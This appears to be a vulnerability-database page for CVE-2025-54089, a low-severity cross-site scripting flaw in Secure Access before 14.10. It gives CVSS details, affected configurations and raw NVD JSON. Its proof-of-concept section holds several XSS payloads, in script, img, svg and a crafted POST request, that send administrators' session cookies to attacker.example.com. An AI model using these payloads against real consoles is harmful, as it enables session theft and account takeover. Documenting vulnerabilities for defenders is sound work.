Security Vulnerability Report
CVE-2025-54089 CVSS 3.4 LOW

Published: 2025-10-02 21:16:01
Last Modified: 2025-10-16 18:21:03

Description

CVE-2025-54089 is a cross-site scripting vulnerability in versions of Secure Access prior to 14.10. Attackers with administrative access to the console can interfere with another administrator’s access to the console. The attack complexity is low; there are no attack requirements. Privileges required to execute the attack are high, and the victim must actively participate in the attack sequence. There is no impact to confidentiality or availability; there is a low impact to integrity.

CVSS Details

CVSS Score: 3.4
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:absolute:secure_access:*:*:*:*:*:*:*:* - VULNERABLE
NetMotion Secure Access < 14.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-54089 PoC: NetMotion Secure Access Console XSS -->
<!-- Attack scenario: An authenticated admin injects malicious script via console input fields -->

<!-- Example 1: Malicious payload injected into a configuration field -->
<script>
// Steal session cookie of the victim administrator
var attackerServer = "https://attacker.example.com/collect";
var sessionData = document.cookie;
var xhr = new XMLHttpRequest();
xhr.open("GET", attackerServer + "?cookie=" + encodeURIComponent(sessionData), true);
xhr.send();
</script>

<!-- Example 2: Using img tag for cookie exfiltration (works even when scripts are partially filtered) -->
<img src=x onerror="fetch('https://attacker.example.com/log?data='+document.cookie)">

<!-- Example 3: SVG-based XSS payload for bypassing input sanitization -->
<svg onload="var i=new Image();i.src='https://attacker.example.com/x?'+document.cookie;">

<!-- Example 4: Full exploitation scenario via HTTP request -->
POST /console/api/config HTTP/1.1
Host: netmotion-console.target.com
Content-Type: application/json
Cookie: session=<attacker_session>

{
  "configName": "<img src=x onerror=\"fetch('https://attacker.example.com/steal?c='+document.cookie)\">",
  "description": "Legitimate configuration description",
  "settings": {}
}

<!-- When victim admin views the configuration list, the payload fires and exfiltrates their session -->

References

https://www.absolute.com/platform/security-information/vulnerability-archive/cve-2025-54089 (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-54089",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-02T21:16:00.860",
    "lastModified": "2025-10-16T18:21:03.213",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "CVE-2025-54089 is a cross-site scripting vulnerability in versions\nof secure access prior to 14.10. Attackers with administrative access to the\nconsole can interfere with another administrator’s access to the console. The\nattack complexity is low; there are no attack requirements. Privileges required\nto execute the attack are high and the victim must actively participate in the\nattack sequence. There is no impact to confidentiality or availability, there\nis a low impact to integrity."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 4.6,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "HIGH",
            "userInteraction": "ACTIVE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "LOW",
            "vulnAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:N/I:L/A:N",
            "baseScore": 3.4,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.7,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:absolute:secure_access:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "14.10",
                "matchCriteriaId": "A4C71B0A-C4A4-421F-A1B4-0CCD7FECEBF1"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.absolute.com/platform/security-information/vulnerability-archive/cve-2025-54089",
        "source": "[email protected]",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}